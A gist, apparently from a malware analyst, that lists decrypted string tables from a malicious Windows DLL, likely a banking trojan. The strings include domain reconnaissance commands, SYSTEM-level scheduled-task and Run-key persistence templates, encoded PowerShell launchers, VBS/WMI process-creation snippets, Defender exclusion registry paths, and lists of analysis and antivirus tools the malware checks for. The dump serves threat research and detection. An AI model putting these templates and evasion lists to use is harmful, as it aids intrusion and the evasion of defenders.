
@tccontre
Created October 27, 2022 10:52
[+] decrypted data buffer at 0x1001E0D8:
--------------------------------------------
[0] -> SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
[1] -> cmd /c set
[2] -> .lnk
[3] -> nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
[4] -> SoNuce]ugdiB3c[doMuce2s81*uXmcvP
[5] -> arp -a
[6] -> ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
[7] -> powershell.exe
[8] -> %u;%u;%u;
[9] -> route print
[10] -> error res='%s' err=%d len=%u
[11] -> Microsoft
[12] -> 89290af9
[13] -> ProfileImagePath
[14] -> nltest /domain_trusts /all_trusts
[15] -> Self check
[16] -> net localgroup
[17] -> qwinsta
[18] -> Start screenshot
[19] -> bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
[20] -> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[21] -> \System32\WindowsPowerShell\v1.0\powershell.exe
[22] -> ipconfig /all
[23] -> whoami /all
[24] -> "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
[25] -> powershell.exe -encodedCommand
[26] -> amstream.dll
[27] -> %s \"$%s = \\\"%s\\\\; & $%s\"
[28] -> at.exe %u:%u "%s" /I
[29] -> ERROR: GetModuleFileNameW() failed with error: %u
[30] -> powershell.exe -encodedCommand %S
[31] -> schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
[32] -> schtasks.exe /Delete /F /TN %u
[33] -> 3c91e539
[34] -> %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
[35] -> netstat -nao
[36] -> /t5
[37] -> %s "$%s = \"%s\"; & $%s"
[38] -> net view
[39] -> /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
[40] -> net share
[41] -> SELF_TEST_1
[42] -> regsvr32.exe
[43] -> Self test FAILED!!!
[44] -> cmd
[45] -> Self check ok!
[46] -> Self test OK.
[47] -> ProgramData
[48] -> runas
[49] -> c:\ProgramData
[+] decrypted data buffer at 0x1001E0D8:
--------------------------------------------
[0] -> .dat
[1] -> t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
[2] -> aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
[3] -> SystemRoot
[4] -> type=0x%04X
[5] -> SpyNetReporting
[6] -> from
[7] -> netapi32.dll
[8] -> SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
[9] -> egui.exe;ekrn.exe
[10] -> Initializing database...
[11] -> rundll32.exe
[12] -> vbs
[13] -> 1234567890
[14] -> SysWOW64
[15] -> MsMpEng.exe
[16] -> .exe
[17] -> Win32_ComputerSystem
[18] -> CommandLine
[19] -> frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe
[20] -> %s\system32\
[21] -> vkise.exe;isesrv.exe;cmdagent.exe
[22] -> Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
[23] -> %SystemRoot%\System32\OneDriveSetup.exe
[24] -> application/x-shockwave-flash
[25] -> SELECT * FROM AntiVirusProduct
[26] -> %SystemRoot%\explorer.exe
[27] -> Win32_Bios
[28] -> %SystemRoot%\SysWOW64\explorer.exe
[29] -> Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
[30] -> %SystemRoot%\SysWOW64\msra.exe
[31] -> Winsta0
[32] -> setupapi.dll
[33] -> image/pjpeg
[34] -> Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'")
For Each objFile in colFiles
objFile.Copy("%s")
Next
[35] -> %SystemRoot%\System32\msra.exe
[36] -> Win32_Product
[37] -> open
[38] -> System32
[39] -> aswhooka.dll
[40] -> ntdll.dll
[41] -> TRUE
[42] -> C:\INTERNAL\__empty
[43] -> \\.\pipe\
[44] -> Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
[45] -> image/gif
[46] -> LOCALAPPDATA
[47] -> {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
[48] -> ROOT\CIMV2
[49] -> c:\\
[50] -> Content-Type: application/x-www-form-urlencoded
[51] -> %SystemRoot%\SysWOW64\dxdiag.exe
[52] -> %SystemRoot%\System32\xwizard.exe
[53] -> crypt32.dll
[54] -> FALSE
[55] -> %SystemRoot%\SysWOW64\mobsync.exe
[56] -> Name
[57] -> c:\hiberfil.sysss
[58] -> */*
[59] -> ws2_32.dll
[60] -> NTUSER.DAT
[61] -> wininet.dll
[62] -> %SystemRoot%\System32\mobsync.exe
[63] -> %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
[64] -> mcshield.exe
[65] -> abcdefghijklmnopqrstuvwxyz
[66] -> cscript.exe
[67] -> displayName
[68] -> %ProgramFiles%\Internet Explorer\iexplore.exe
[69] -> SELECT * FROM Win32_OperatingSystem
[70] -> S:(ML;;NW;;;LW)
[71] -> .cfg
[72] -> userenv.dll
[73] -> WScript.Sleep %u
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2")
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("%s", null, nul, nul)
WSCript.Sleep 2000
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile("%s")
[74] -> wmic process call create 'expand "%S" "%S"'
[75] -> SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
[76] -> select
[77] -> \sf2.dll
[78] -> Win32_PhysicalMemory
[79] -> AvastSvc.exe
[80] -> SubmitSamplesConsent
[81] -> %SystemRoot%\System32\wermgr.exe
[82] -> bcrypt.dll
[83] -> reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
[84] -> ByteFence.exe
[85] -> SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
[86] -> bdagent.exe;vsserv.exe;vsservppl.exe
[87] -> %SystemRoot%\SysWOW64\explorer.exe
[88] -> mpr.dll
[89] -> avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
[90] -> dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
[91] -> fmon.exe
[92] -> LastBootUpTime
[93] -> Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
[94] -> APPDATA
[95] -> %u.%u.%u.%u.%u.%u.%04x
[96] -> root\SecurityCenter2
[97] -> shell32.dll
[98] -> image/jpeg
[99] -> .dll
[100] -> winsta0\default
[101] -> pstorec.dll
[102] -> coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
[103] -> SOFTWARE\Microsoft\Windows Defender\SpyNet
[104] -> WBJ_IGNORE
[105] -> fshoster32.exe
[106] -> SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
[107] -> wtsapi32.dll
[108] -> WRSA.exe
[109] -> wpcap.dll
[110] -> %SystemRoot%\explorer.exe
[111] -> ccSvcHst.exe
[112] -> aabcdeefghiijklmnoopqrstuuvwxyyz
[113] -> https
[114] -> iphlpapi.dll
[115] -> %SystemRoot%\SysWOW64\OneDriveSetup.exe
[116] -> urlmon.dll
[117] -> Caption
[118] -> avp.exe;kavtray.exe
[119] -> %SystemRoot%\SysWOW64\wermgr.exe
[120] -> shlwapi.dll
[121] -> snxhk_border_mywnd
[122] -> wbj.go
[123] -> Win32_PnPEntity
[124] -> Packages
[125] -> SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
[126] -> %SystemRoot%\SysWOW64\xwizard.exe
[127] -> Win32_DiskDrive
[128] -> WQL
[129] -> user32.dll
[130] -> Create
[131] -> aswhookx.dll
[132] -> SAVAdminService.exe;SavService.exe
[133] -> ALLUSERSPROFILE
[134] -> MBAMService.exe;mbamgui.exe
[135] -> LocalLow
[136] -> %S.%06d
[137] -> advapi32.dll
[138] -> kernel32.dll
[139] -> Software\Microsoft
[140] -> Win32_Process
[141] -> %SystemRoot%\System32\dxdiag.exe
[142] -> SELECT * FROM Win32_Processor
[143] -> cmd.exe